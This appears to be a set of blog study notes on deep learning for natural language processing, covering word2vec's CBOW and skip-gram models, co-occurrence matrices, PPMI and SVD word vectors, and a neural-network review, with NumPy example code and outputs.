As the neural network we use the model named **continuous bag-of-words (CBOW)** proposed in the original word2vec.

3.2.1 Inference with the CBOW model

(figure)

The hidden-layer neurons are the "average" of the values obtained by transforming each input layer through the fully connected layer.

If the fully connected layer transforms the first input layer into $h_1$ and the second into $h_2$, the hidden-layer neurons are $\frac{1}{2}(h_1+h_2)$.

The transformation from the input layer to the hidden layer is performed by a fully connected layer whose weight is $W_{in}$; here $W_{in}$ is a $7\times 3$ matrix. To give away the ending: this weight is exactly the distributed representation of words we are after. Vectors obtained this way encode word meanings well. That is the whole picture of word2vec.

import sys
sys.path.append('..')
import numpy as np
from common.layers import MatMul

# sample context data
c0 = np.array([[1, 0, 0, 0, 0, 0, 0]])
c1 = np.array([[0, 0, 1, 0, 0, 0, 0]])

# initial weights
W_in = np.random.randn(7, 3)
W_out = np.random.randn(3, 7)

# create the layers
in_layer0 = MatMul(W_in)
in_layer1 = MatMul(W_in)
out_layer = MatMul(W_out)

# forward propagation
h0 = in_layer0.forward(c0)
h1 = in_layer1.forward(c1)
h = 0.5 * (h0 + h1)
s = out_layer.forward(h)

print(s)
[[-1.6202109   0.75824908 -0.05364709 -0.39814822 -0.37373042  0.51207421   0.8510953 ]]

The CBOW model is a simple network structure that uses no activation function.

3.2.2 Training the CBOW model

(figure)

The context is you and goodbye, and the correct label (the word the network should predict) is say. If the network has "good weights", then among the neurons that represent probabilities, the neuron corresponding to the correct answer should score higher.

Training the CBOW model means adjusting the weights so that its predictions become accurate. As a result, the weight $W_{in}$ (strictly speaking, both $W_{in}$ and $W_{out}$) learns vectors that capture the patterns in which words appear.

Training only requires the Softmax function and the cross-entropy error: first convert the scores into probabilities with Softmax, then compute the cross-entropy error between those probabilities and the supervised labels, and use it as the loss to train on.
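As a rough sketch of that computation (not the actual common.layers.SoftmaxWithLoss code, whose internals are not shown in these notes), the loss could be computed like this:

import numpy as np

def softmax_cross_entropy(score, t_onehot, eps=1e-7):
    # Softmax: turn scores into probabilities (shift by the max for numerical stability)
    score = score - score.max(axis=1, keepdims=True)
    p = np.exp(score) / np.exp(score).sum(axis=1, keepdims=True)
    # cross-entropy error against the one-hot labels, averaged over the batch
    return -np.sum(t_onehot * np.log(p + eps)) / len(score)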

3.2.3 word2vec weights and distributed representations

The network used in word2vec has two weights: the weight of the input-side fully connected layer ($W_{in}$) and the weight of the output-side fully connected layer ($W_{out}$).

In general, each row of the input-side weight $W_{in}$ corresponds to one word's distributed representation. The output-side weight $W_{out}$ likewise stores vectors that encode word meanings.
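So, for example, assuming a trained SimpleCBOW model as implemented in section 3.4 below and the word_to_id mapping from preprocess(), looking up a word's distributed representation is just a row access (illustrative only):

vec_say = model.word_vecs[word_to_id['say']]  # row of W_in for "say"
print(vec_say.shape)                          # (hidden_size,)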

3.3 Preparing the training data

3.3.1 Contexts and target

(figure)

The input to the neural network used in word2vec is the contexts, and its correct label is the word surrounded by those contexts, i.e. the target.

We take each word in the corpus as the target and extract the words around it as its context. Doing this for every word in the corpus (except the words at both ends) yields contexts and target.

Convert the corpus text into word IDs:

import sys
sys.path.append('..')
from common.util import preprocess

text = 'You say goodbye and I say hello.'
corpus, word_to_id, id_to_word = preprocess(text)
print(corpus)
print(id_to_word)
[0 1 2 3 4 1 5 6]
{0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}

Implement a function that generates the contexts and the target words:

def create_contexts_target(corpus, window_size=1):
    """
    corpus: list of word IDs
    window_size: size of the context window
    return: contexts and target as NumPy arrays
    """
    # target[0] holds the 0th target word, target[1] the 1st target word, and so on.
    target = corpus[window_size:-window_size]
    # contexts is a two-dimensional array whose 0th axis holds the individual
    # context data: contexts[0] is the 0th context, contexts[1] the 1st, etc.
    contexts = []

    for idx in range(window_size, len(corpus)-window_size):
        cs = []
        for t in range(-window_size, window_size + 1):
            if t == 0:
                continue
            cs.append(corpus[idx + t])
        contexts.append(cs)
    return np.array(contexts), np.array(target)

contexts, target = create_contexts_target(corpus, window_size=1)

print(contexts)
[[0 2]
 [1 3]
 [2 4]
 [3 1]
 [4 5]
 [1 6]]

We have now generated contexts and target from the corpus; all that remains is to hand them to the CBOW model. However, the elements of contexts and target are still word IDs, so they must also be converted to the one-hot representation.

3.3.2 Converting to the one-hot representation

(figure)

import sys
sys.path.append('..')
from common.util import preprocess, create_contexts_target, convert_one_hot

text = 'You say goodbye and I say hello.'

corpus, word_to_id, id_to_word = preprocess(text)

contexts, target = create_contexts_target(corpus, window_size=1)

vocab_size = len(word_to_id)
target = convert_one_hot(target, vocab_size)
contexts = convert_one_hot(contexts, vocab_size)

3.4 Implementing the CBOW model

(figure)

import sys
sys.path.append('..')
import numpy as np
from common.layers import MatMul, SoftmaxWithLoss

class SimpleCBOW:
    def __init__(self, vocab_size, hidden_size):
        """
        vocab_size: number of words in the vocabulary
        hidden_size: number of neurons in the hidden layer
        """
        V, H = vocab_size, hidden_size

        # initialize the weights (32-bit floating point)
        W_in = 0.01 * np.random.randn(V, H).astype('f')
        W_out = 0.01 * np.random.randn(H, V).astype('f')

        # create the layers
        self.in_layer0 = MatMul(W_in)
        self.in_layer1 = MatMul(W_in)
        self.out_layer = MatMul(W_out)
        self.loss_layer = SoftmaxWithLoss()

        # collect all weights and gradients into lists
        layers = [self.in_layer0, self.in_layer1, self.out_layer]
        self.params, self.grads = [], []
        for layer in layers:
            self.params += layer.params
            self.grads += layer.grads

        # store the distributed representation of the words as a member variable
        self.word_vecs = W_in

    def forward(self, contexts, target):
        """
        Forward propagation. Takes contexts and target and returns the loss.
        """
        h0 = self.in_layer0.forward(contexts[:, 0])
        h1 = self.in_layer1.forward(contexts[:, 1])
        h = (h0 + h1) * 0.5
        score = self.out_layer.forward(h)
        loss = self.loss_layer.forward(score, target)
        return loss

    def backward(self, dout=1):
        """
        Backward propagation.
        """
        ds = self.loss_layer.backward(dout)
        da = self.out_layer.backward(ds)
        da *= 0.5
        self.in_layer1.backward(da)
        self.in_layer0.backward(da)
        return None

Implementing the training

Training the CBOW model is exactly the same as training an ordinary neural network: first prepare the training data for the network, then compute gradients and update the weight parameters step by step.

import sys
sys.path.append('..')
from common.trainer import Trainer
from common.optimizer import Adam
from common.util import preprocess, create_contexts_target, convert_one_hot

window_size = 1
hidden_size = 5
batch_size = 3
max_epoch = 1000

text = 'You say goodbye and I say hello.'
corpus, word_to_id, id_to_word = preprocess(text)

vocab_size = len(word_to_id)
contexts, target = create_contexts_target(corpus, window_size)
target = convert_one_hot(target, vocab_size)
contexts = convert_one_hot(contexts, vocab_size)

model = SimpleCBOW(vocab_size, hidden_size)
optimizer = Adam()
trainer = Trainer(model, optimizer)
trainer.fit(contexts, target, max_epoch, batch_size)
trainer.plot()

(figure)

Inspect the learned weight parameters:

word_vecs = model.word_vecs
for word_id, word in id_to_word.items():
    print(word, word_vecs[word_id])
you [-0.9274265  -0.91214865 -0.9109259   0.8992449  -1.6783223 ]
say [ 1.1131934  1.0601219  1.1271317 -1.1453978 -1.2170266]
goodbye [-0.9434733  -0.9451493  -1.0034578   1.0183493   0.01961206]
and [ 0.68801135  1.3125733   0.7976222  -0.66661966 -1.7473713 ]
i [-0.9705925  -0.96961325 -1.0059276   1.0296363   0.02202316]
hello [-0.9177436  -0.9189522  -0.90853983  0.89148486 -1.6829524 ]
. [ 1.2674404   0.2086714   1.1918164  -1.3567644   0.25613624]

The small corpus used here does not give very good results. The main reason, of course, is that the corpus is too small; with a larger, more practical corpus we can expect better results. But that in turn raises a new problem of processing speed, because the current CBOW implementation has several efficiency problems.

3.5 Supplementary remarks on word2vec

3.5.1 The CBOW model and probability

The probability that the target word is $w_t$ given the contexts $w_{t-1}$ and $w_{t+1}$, written as a posterior probability:

$$P(w_t|w_{t-1},w_{t+1})$$

The loss function of the CBOW model simply takes the $\log$ of this probability and attaches a minus sign. Incidentally, this is also called the negative log likelihood:

$$L=-\log P(w_t|w_{t-1}, w_{t+1})$$

This is the loss function for a single sample of data. Extending it to the entire corpus:

    $$L=-\frac{1}{T}\sum^T_{t=1}\log P(w_t|w_{t-1}, w_{t+1})$$
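As a quick check with made-up numbers: if the model assigns probability 0.8 to the correct word for one sample, that sample contributes $-\log 0.8 \approx 0.22$ to the loss; if it assigns only 0.1, the contribution is $-\log 0.1 \approx 2.30$. Worse predictions mean a larger loss.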

3.5.2 The skip-gram model

(figure)

skip-gram is the model obtained by swapping the contexts and target handled by the CBOW model:

• the CBOW model predicts the middle word (the target) from the multiple context words

• the skip-gram model predicts the multiple surrounding words (the context) from the middle word (the target)

skip-gram can be modeled as:

$$P(w_{t-1}, w_{t+1}|w_t)$$

That is, "the probability that $w_{t-1}$ and $w_{t+1}$ occur simultaneously given $w_t$". Assuming the context words are conditionally independent given the target, this factorizes as:

$$P(w_{t-1},w_{t+1}|w_t)=P(w_{t-1}|w_t)P(w_{t+1}|w_t)$$

Substituting this into the cross-entropy loss yields the skip-gram loss function:

    $$L=-\frac{1}{T}\sum^T_{t=1}(\log P(w_{t-1}|w_t) + \log P(w_{t+1}|w_t))$$
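Mirroring the SimpleCBOW class from section 3.4, the skip-gram forward pass can be sketched as follows (a sketch under the same layer API; the class name and details here are illustrative, not the book's exact code):

class SimpleSkipGram:
    def __init__(self, vocab_size, hidden_size):
        V, H = vocab_size, hidden_size
        W_in = 0.01 * np.random.randn(V, H).astype('f')
        W_out = 0.01 * np.random.randn(H, V).astype('f')
        self.in_layer = MatMul(W_in)
        self.out_layer = MatMul(W_out)
        # one loss layer per context word (window_size=1 gives two)
        self.loss_layer0 = SoftmaxWithLoss()
        self.loss_layer1 = SoftmaxWithLoss()

    def forward(self, contexts, target):
        # the target word is the input; each context word acts as a label
        h = self.in_layer.forward(target)
        score = self.out_layer.forward(h)
        l0 = self.loss_layer0.forward(score, contexts[:, 0])
        l1 = self.loss_layer1.forward(score, contexts[:, 1])
        return l0 + l1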

3.5.3 Count-based vs. inference-based

• count-based methods obtain distributed representations of words in a single pass over the statistics of the entire corpus

• inference-based methods learn by repeatedly looking at parts of the corpus (mini-batch learning)

After word2vec, researchers proposed the GloVe method, which fuses the inference-based and count-based approaches. Its idea is to incorporate statistics of the whole corpus into the loss function and then train with mini-batches (see the paper for details). In this way the two methodologies were successfully combined.

3.6 Summary

• inference-based methods aim at prediction, and obtain distributed representations of words as a by-product

• word2vec is an inference-based method built from a simple 2-layer neural network

• word2vec offers the skip-gram model and the CBOW model

• the CBOW model predicts 1 word (the target) from multiple words (the context)

• the skip-gram model, conversely, predicts multiple words (the context) from 1 word (the target)

• because word2vec permits incremental learning of its weights, distributed representations can be updated, or new words added, efficiently

/posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86-2-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%92%8C%E5%8D%95%E8%AF%8D%E7%9A%84%E5%88%86%E5%B8%83%E5%BC%8F%E8%A1%A8%E7%A4%BA/

Main text

2.1 What is natural language processing?

To let computers understand the meanings of words, we need ways to represent word meaning:

• thesaurus-based methods

• count-based methods

• inference-based methods (word2vec)

2.2 Thesauruses

In a thesaurus, words with the same meaning (synonyms) or similar meanings (near-synonyms) are grouped together.

Thesauruses used in natural language processing sometimes define finer-grained relations between words, such as "hypernym-hyponym" and "whole-part" relations.

2.2.1 WordNet

WordNet is a thesaurus that Princeton University began developing in 1985. It has been used in a great deal of research and is active in all kinds of natural language processing applications.

2.2.2 Problems with thesauruses

• hard to keep up with the times

• high labor cost

• cannot express subtle differences between words

2.3 Count-based methods

A corpus contains a great deal of practical knowledge about natural language: how sentences are written, how words are chosen, what words mean. The goal of count-based methods is to extract the essence automatically and efficiently from such knowledge-rich corpora.

2.3.1 Preprocessing a corpus with Python

Split the text into words (tokenization), then convert the resulting word list into a list of word IDs.

    text = 'You say goodbye and I say hello.'
    text = text.lower()
    text = text.replace('.', ' .')
    text
    'you say goodbye and i say hello .'
    words = text.split(' ')
    words
    ['you', 'say', 'goodbye', 'and', 'i', 'say', 'hello', '.']

Assign IDs to the words so that we can work with a list of word IDs:

word_to_id = {}
id_to_word = {}

for word in words:
    if word not in word_to_id:
        new_id = len(word_to_id)
        word_to_id[word] = new_id
        id_to_word[new_id] = word
id_to_word
{0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}
word_to_id
{'you': 0, 'say': 1, 'goodbye': 2, 'and': 3, 'i': 4, 'hello': 5, '.': 6}

Retrieve a word from its word ID:

    id_to_word[1]
    'say'

Retrieve a word ID from a word:

    word_to_id['hello']
    5

Convert the word list into a list of word IDs:

    import numpy as np

    corpus = [word_to_id[w] for w in words]
    corpus = np.array(corpus)
    corpus
    array([0, 1, 2, 3, 4, 1, 5, 6])
def preprocess(text):
    text = text.lower()
    text = text.replace('.', ' .')
    words = text.split(' ')
    word_to_id = {}
    id_to_word = {}
    for word in words:
        if word not in word_to_id:
            new_id = len(word_to_id)
            word_to_id[word] = new_id
            id_to_word[new_id] = word
    corpus = np.array([word_to_id[w] for w in words])
    return corpus, word_to_id, id_to_word

Using this function, the corpus can be preprocessed as follows:

text = 'You say goodbye and I say hello.'
# corpus: list of word IDs; word_to_id: word -> word ID; id_to_word: word ID -> word
corpus, word_to_id, id_to_word = preprocess(text)

2.3.2 Distributed representation of words

Build a compact, sensible vector representation in the word domain. In natural language processing this is called a distributed representation.

2.3.3 The distributional hypothesis

"The meaning of a word is formed by the words around it" — this is called the distributional hypothesis.

Here, the size of the context (how many surrounding words are included) is called the window size.
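For instance, with a window size of 1 the context of a word is simply its left and right neighbor (an illustrative snippet, not code from the book):

words = ['you', 'say', 'goodbye', 'and', 'i', 'say', 'hello', '.']
idx = words.index('goodbye')           # focus on "goodbye"
print(words[idx - 1], words[idx + 1])  # say and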

2.3.4 Co-occurrence matrix

Focusing on one word, count how many times each word appears around it, then aggregate the counts. We call this approach the "count-based method"; some literature calls it the "statistics-based method".

    import sys
    sys.path.append('..')
    import numpy as np
    from common.util import preprocess

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    corpus
    array([0, 1, 2, 3, 4, 1, 5, 6])
    id_to_word
    {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}

(figure)

C = np.array([
    [0, 1, 0, 0, 0, 0, 0],
    [1, 0, 1, 0, 1, 1, 0],
    [0, 1, 0, 1, 0, 0, 0],
    [0, 0, 1, 0, 1, 0, 0],
    [0, 1, 0, 1, 0, 0, 0],
    [0, 1, 0, 0, 0, 0, 1],
    [0, 0, 0, 0, 0, 1, 0],
], dtype=np.int32)
print(C[0])  # vector of the word with ID 0
[0 1 0 0 0 0 0]
print(C[4])  # vector of the word with ID 4
[0 1 0 1 0 0 0]
print(C[word_to_id['goodbye']])  # vector of "goodbye"
[0 1 0 1 0 0 0]

Implement a function that builds the co-occurrence matrix directly from the corpus:

def create_co_matrix(corpus, vocab_size, window_size=1):
    """
    Build the co-occurrence matrix directly from the corpus.
    corpus: list of word IDs
    vocab_size: number of words in the vocabulary
    window_size: window size
    """
    corpus_size = len(corpus)
    co_matrix = np.zeros((vocab_size, vocab_size), dtype=np.int32)
    for idx, word_id in enumerate(corpus):
        for i in range(1, window_size + 1):
            left_idx = idx - i
            right_idx = idx + i

            if left_idx >= 0:
                left_word_id = corpus[left_idx]
                co_matrix[word_id, left_word_id] += 1

            if right_idx < corpus_size:
                right_word_id = corpus[right_idx]
                co_matrix[word_id, right_word_id] += 1
    return co_matrix

2.3.5 Similarity between vectors

Cosine similarity: for two vectors $x=(x_1,x_2,x_3,\dots,x_n)$ and $y=(y_1,y_2,y_3,\dots,y_n)$, their cosine similarity is defined as follows:

$$\mathrm{similarity}(x,y)=\frac{x\cdot y}{\|x\|\,\|y\|}=\frac{x_1y_1+\cdots+x_ny_n}{\sqrt{x_1^2+\cdots+x_n^2}\,\sqrt{y_1^2+\cdots+y_n^2}}$$

def cos_similarity(x, y):
    nx = x / np.sqrt(np.sum(x ** 2))  # normalize x
    ny = y / np.sqrt(np.sum(y ** 2))  # normalize y
    return np.dot(nx, ny)

If a zero vector (a vector whose elements are all 0) is passed in as an argument, a "division by zero" error occurs.

To prevent this, we add a parameter for a tiny value eps (short for epsilon), with default eps=1e-8 (= 0.00000001):

def cos_similarity(x, y, eps=1e-8):
    nx = x / (np.sqrt(np.sum(x ** 2)) + eps)
    ny = y / (np.sqrt(np.sum(y ** 2)) + eps)
    return np.dot(nx, ny)

Similarity between you and i (= I):

    import sys
    sys.path.append('..')
    from common.util import preprocess, create_co_matrix, cos_similarity

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(word_to_id)
    C = create_co_matrix(corpus, vocab_size)
c0 = C[word_to_id['you']]  # word vector of "you"
c1 = C[word_to_id['i']]    # word vector of "i"
    print(cos_similarity(c0, c1))
    0.7071067691154799

2.3.6 Ranking similar words

def most_similar(query, word_to_id, id_to_word, word_matrix, top=5):
    """
    Given a query word, display the words similar to it in descending order.
    """
    # 1. fetch the query word
    if query not in word_to_id:
        print('%s is not found' % query)
        return
    print('\n[query] ' + query)
    query_id = word_to_id[query]
    query_vec = word_matrix[query_id]

    # 2. compute the cosine similarities
    vocab_size = len(id_to_word)
    similarity = np.zeros(vocab_size)
    for i in range(vocab_size):
        similarity[i] = cos_similarity(word_matrix[i], query_vec)

    # 3. output the values in descending order of cosine similarity
    count = 0
    # argsort() sorts the elements of a NumPy array in ascending order
    # (but returns the indices of the array)
    for i in (-1 * similarity).argsort():
        if id_to_word[i] == query:
            continue
        print(' %s: %s' % (id_to_word[i], similarity[i]))

        count += 1
        if count >= top:
            return

Let's try it out, using you as the query word and displaying the words similar to it.

    import sys
    sys.path.append('..')
    from common.util import preprocess, create_co_matrix, most_similar

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(word_to_id)
    C = create_co_matrix(corpus, vocab_size)

    most_similar('you', word_to_id, id_to_word, C, top=5)
[query] you
 goodbye: 0.7071067691154799
 i: 0.7071067691154799
 hello: 0.7071067691154799
 say: 0.0
 and: 0.0

2.4 Improving count-based methods

2.4.1 Pointwise mutual information

If we look only at raw occurrence counts, then the is more strongly related to car than drive is: merely because the is a common word, it is judged to have a strong relation to car.

Pointwise Mutual Information (PMI). For random variables $x$ and $y$, their PMI is defined as follows:

$$\mathrm{PMI}(x,y)=\log_2\frac{P(x,y)}{P(x)P(y)}$$

$P(x)$ is the probability that $x$ occurs, $P(y)$ the probability that $y$ occurs, and $P(x, y)$ the probability that $x$ and $y$ occur together. The higher the PMI value, the stronger the relatedness.

In the natural-language case, $P(x)$ is the probability that word $x$ appears in the corpus. Suppose a corpus contains 10 000 words and the word the appears 100 times; then $P(\mathrm{"the"})=\frac{100}{10000}=0.01$. Likewise, $P(x, y)$ is the probability that words $x$ and $y$ co-occur; if the and car co-occur 10 times, then $P(\mathrm{"the"},\mathrm{"car"})=\frac{10}{10000}=0.001$.

Writing the co-occurrence matrix as $C$, the co-occurrence count of words $x$ and $y$ as $C(x, y)$, the individual counts of $x$ and $y$ as $C(x)$ and $C(y)$, and the number of words in the corpus as $N$:

    $$\mathrm{PMI}(x,y)=\log_2\frac{P(x,y)}{P(x)P(y)}=\log_2\frac{\frac{C(x,y)}{N}}{\frac{C(x)}{N}\frac{C(y)}{N}}=\log_2\frac{C(x,y)\cdot N}{C(x)C(y)}$$

With PMI, drive has a stronger relation to car than the does, which is the result we wanted. It comes about because we now take into account how often each word occurs on its own: since the itself appears many times, its PMI score is pulled down. The "≈" (near equal) sign in such expressions means approximately equal.
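A worked example with made-up counts: if $N=10000$, $C(\mathrm{the})=100$, $C(\mathrm{car})=20$ and $C(\mathrm{the},\mathrm{car})=10$, then $\mathrm{PMI}(\mathrm{the},\mathrm{car})=\log_2\frac{10\cdot 10000}{100\cdot 20}=\log_2 50\approx 5.64$.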

The problem with PMI: when two words co-occur 0 times, $\log_2 0=-\infty$. To solve this, in practice we use the following positive pointwise mutual information (Positive PMI, PPMI):

    $$\mathrm{PPMI}(x,y)=\max(0,\mathrm{PMI}(x,y))$$

When PMI is negative it is treated as 0, so the relatedness between words can be expressed as a real number greater than or equal to 0.

def ppmi(C, verbose=False, eps=1e-8):
    """
    verbose: flag that decides whether to report progress.
    When processing a large corpus, set verbose=True to monitor the run.
    The tiny value eps guards against np.log2(0) = -inf.
    """
    M = np.zeros_like(C, dtype=np.float32)
    N = np.sum(C)
    S = np.sum(C, axis=0)
    total = C.shape[0] * C.shape[1]
    cnt = 0
    for i in range(C.shape[0]):
        for j in range(C.shape[1]):
            pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)
            M[i, j] = max(0, pmi)
            if verbose:
                cnt += 1
                if cnt % (total//100+1) == 0:
                    print('%.1f%% done' % (100*cnt/total))
    return M

Convert the co-occurrence matrix into a PPMI matrix:

    import sys
    sys.path.append('..')
    import numpy as np
    from common.util import preprocess, create_co_matrix, cos_similarity, ppmi

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(word_to_id)
    C = create_co_matrix(corpus, vocab_size)
    W = ppmi(C)
np.set_printoptions(precision=3)  # 3 significant digits

    print('covariance matrix')
    print(C)
    print('-'*50)
    print('PPMI')
    print(W)
covariance matrix
[[0 1 0 0 0 0 0]
 [1 0 1 0 1 1 0]
 [0 1 0 1 0 0 0]
 [0 0 1 0 1 0 0]
 [0 1 0 1 0 0 0]
 [0 1 0 0 0 0 1]
 [0 0 0 0 0 1 0]]
--------------------------------------------------
PPMI
[[0.    1.807 0.    0.    0.    0.    0.   ]
 [1.807 0.    0.807 0.    0.807 0.807 0.   ]
 [0.    0.807 0.    1.807 0.    0.    0.   ]
 [0.    0.    1.807 0.    1.807 0.    0.   ]
 [0.    0.807 0.    1.807 0.    0.    0.   ]
 [0.    0.807 0.    0.    0.    0.    2.807]
 [0.    0.    0.    0.    0.    2.807 0.   ]]

The problem with the PPMI matrix: as the vocabulary of the corpus grows, the dimensionality of each word vector grows with it.

2.4.2 Dimensionality reduction

Reduce the number of vector dimensions while keeping as much of the "important information" as possible.

(figure)

Singular Value Decomposition (SVD). SVD factorizes an arbitrary matrix into a product of three matrices:

    $$X=USV^T$$

SVD decomposes an arbitrary matrix $X$ into the product of three matrices $U$, $S$, $V$, where $U$ and $V$ are orthogonal matrices whose column vectors are mutually orthogonal, and $S$ is a diagonal matrix whose elements are all 0 except those on the diagonal.
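A small NumPy sanity check of this factorization (note that np.linalg.svd returns the singular values of $S$ as a vector):

import numpy as np

X = np.random.randn(4, 4)
U, S, Vt = np.linalg.svd(X)
# rebuild X from the three factors; np.diag(S) restores the diagonal matrix S
print(np.allclose(X, U @ np.diag(S) @ Vt))  # True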

2.4.3 Dimensionality reduction with SVD

    import sys
    sys.path.append('..')
    import numpy as np
    import matplotlib.pyplot as plt
    from common.util import preprocess, create_co_matrix, ppmi

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(id_to_word)
    C = create_co_matrix(corpus, vocab_size, window_size=1)
    W = ppmi(C)

    # SVD
    U, S, V = np.linalg.svd(W)
print(C[0])  # co-occurrence matrix
[0 1 0 0 0 0 0]
print(W[0])  # PPMI matrix
    [0.    1.807 0.    0.    0.    0.    0.   ]
    print(U[0]) # SVD
    [-3.409e-01 -1.110e-16 -3.886e-16 -1.205e-01  0.000e+00  9.323e-01  2.226e-16]

The original sparse vector $W[0]$ has been converted by SVD into the dense vector $U[0]$.

for word, word_id in word_to_id.items():
    plt.annotate(word, (U[word_id, 0], U[word_id, 1]))
plt.scatter(U[:,0], U[:,1], alpha=0.5)
plt.show()


(figure)

goodbye and hello, and likewise you and i, are positioned close together, which agrees reasonably well with our intuition.

If the matrix size is $N$, computing the SVD costs $O(N^3)$, i.e. the work grows with the cube of $N$. Since such a computation is infeasible in practice, faster methods such as Truncated SVD are commonly used instead.
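For instance, the randomized (truncated) SVD from sklearn, which section 2.4.5 below also uses, computes only the leading singular vectors instead of the full decomposition (sketch):

from sklearn.utils.extmath import randomized_svd

# only the top 2 singular vectors/values are computed, which scales far
# better than a full np.linalg.svd on large matrices
U2, S2, V2 = randomized_svd(W, n_components=2, n_iter=5, random_state=None)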

2.4.4 The PTB dataset

The PTB corpus we use is provided on the web page of Tomas Mikolov, the inventor of word2vec. It is distributed as text files and, compared with the original PTB articles, has had some preprocessing applied, such as replacing rare words with a special token (unk, short for unknown) and replacing concrete numbers with "N".

PTB download: http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz

    import sys
    sys.path.append('..')
    from dataset import ptb

    corpus, word_to_id, id_to_word = ptb.load_data('train')
    print('corpus size:', len(corpus))
    print('corpus[:30]:', corpus[:30])
    print()
    print('id_to_word[0]:', id_to_word[0])
    print('id_to_word[1]:', id_to_word[1])
    print('id_to_word[2]:', id_to_word[2])
    print()
    print("word_to_id['car']:", word_to_id['car'])
    print("word_to_id['happy']:", word_to_id['happy'])
    print("word_to_id['lexus']:", word_to_id['lexus'])
corpus size: 929589
corpus[:30]: [ 0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29]

id_to_word[0]: aer
id_to_word[1]: banknote
id_to_word[2]: berlitz

word_to_id['car']: 3856
word_to_id['happy']: 4428
word_to_id['lexus']: 7426

2.4.5 Evaluation on the PTB dataset

Here it is recommended to use a faster SVD for the large matrix, which requires installing the sklearn module. The basic SVD (np.linalg.svd()) still works, but it needs far more time and memory.

    import sys
    sys.path.append('..')
    import numpy as np
    from common.util import most_similar, create_co_matrix, ppmi
    from dataset import ptb

    window_size = 2
    wordvec_size = 100
    corpus, word_to_id, id_to_word = ptb.load_data('train')
    vocab_size = len(word_to_id)
    print('counting co-occurrence ...')
    C = create_co_matrix(corpus, vocab_size, window_size)
    print('calculating PPMI ...')
    W = ppmi(C, verbose=True)

    print('calculating SVD ...')
try:
    # truncated SVD (fast!)
    from sklearn.utils.extmath import randomized_svd
    U, S, V = randomized_svd(W, n_components=wordvec_size, n_iter=5, random_state=None)
except ImportError:
    # SVD (slow)
    U, S, V = np.linalg.svd(W)

    word_vecs = U[:, :wordvec_size]
    querys = ['you', 'year', 'car', 'toyota']
for query in querys:
    most_similar(query, word_to_id, id_to_word, word_vecs, top=5)
counting co-occurrence ...
calculating PPMI ...
C:\Users\gzjzx\Jupyter\DL_Advanced\..\common\util.py:139: RuntimeWarning: overflow encountered in long_scalars  pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)
C:\Users\gzjzx\Jupyter\DL_Advanced\..\common\util.py:139: RuntimeWarning: invalid value encountered in log2  pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)
1.0% done
2.0% done
...
99.0% done
calculating SVD ...

[query] you
 i: 0.6670734286308289
 we: 0.6116090416908264
 someone: 0.549290657043457
 do: 0.5428591370582581
 'll: 0.5290063619613647

[query] year
 month: 0.6682149171829224
 quarter: 0.6562734246253967
 next: 0.6095362305641174
 fiscal: 0.5867708921432495
 earlier: 0.5734390616416931

[query] car
 luxury: 0.6188714504241943
 auto: 0.6056600213050842
 corsica: 0.5616344809532166
 domestic: 0.5556454062461853
 cars: 0.521730363368988

[query] toyota
 motor: 0.7244030237197876
 motors: 0.6643518209457397
 nissan: 0.6601378917694092
 lexus: 0.6493816375732422
 honda: 0.6213896870613098

We have successfully encoded word meanings into vectors — a happy result! Using a corpus, we counted the words appearing in each word's context, converted the counts into a PPMI matrix, and then obtained good word vectors through SVD-based dimensionality reduction. This is the distributed representation of words, where every word is represented as a fixed-length dense vector.

2.5 Summary

• with a thesaurus such as WordNet, we can obtain synonyms and near-synonyms and measure similarity between words

• thesaurus-based methods have problems: building the word lists takes a lot of human labor, and new words are hard to keep up with

• today, vectorizing words using a corpus is the mainstream approach

• most recent word-vectorization methods rest on the distributional hypothesis that "the meaning of a word is formed by the words around it"

• count-based methods count and aggregate, for every word in the corpus, the occurrences of its surrounding words (= the co-occurrence matrix)

• converting the co-occurrence matrix into a PPMI matrix and reducing its dimensionality turns large sparse vectors into small dense vectors

• in the word vector space, words that are close in meaning should also be close in distance

/posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86-1-%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E7%9A%84%E5%A4%8D%E4%B9%A0/

Main text

1.4 Solving a problem with a neural network

1.4.1 The spiral dataset

import sys
sys.path.append('..')  # setting for importing files from the parent directory
from dataset import spiral
import matplotlib.pyplot as plt

x, t = spiral.load_data()
print('x', x.shape)  # (300, 2)
print('t', t.shape)  # (300, 3)
x (300, 2)
t (300, 3)
# plot the data points
N = 100
CLS_NUM = 3
markers = ['o', 'x', '^']
for i in range(CLS_NUM):
    plt.scatter(x[i * N:(i + 1) * N, 0], x[i * N: (i + 1) * N, 1], s=40, marker=markers[i])
plt.show()

(figure)

1.4.2 Implementing the neural network

import sys
sys.path.append('..')
import numpy as np
from common.layers import Affine, Sigmoid, SoftmaxWithLoss


class TwoLayerNet:
    def __init__(self, input_size, hidden_size, output_size):
        I, H, O = input_size, hidden_size, output_size
        # initialize the weights and biases
        W1 = 0.01 * np.random.randn(I, H)
        b1 = np.zeros(H)
        W2 = 0.01 * np.random.randn(H, O)
        b2 = np.zeros(O)
        # create the layers
        self.layers = [Affine(W1, b1), Sigmoid(), Affine(W2, b2)]
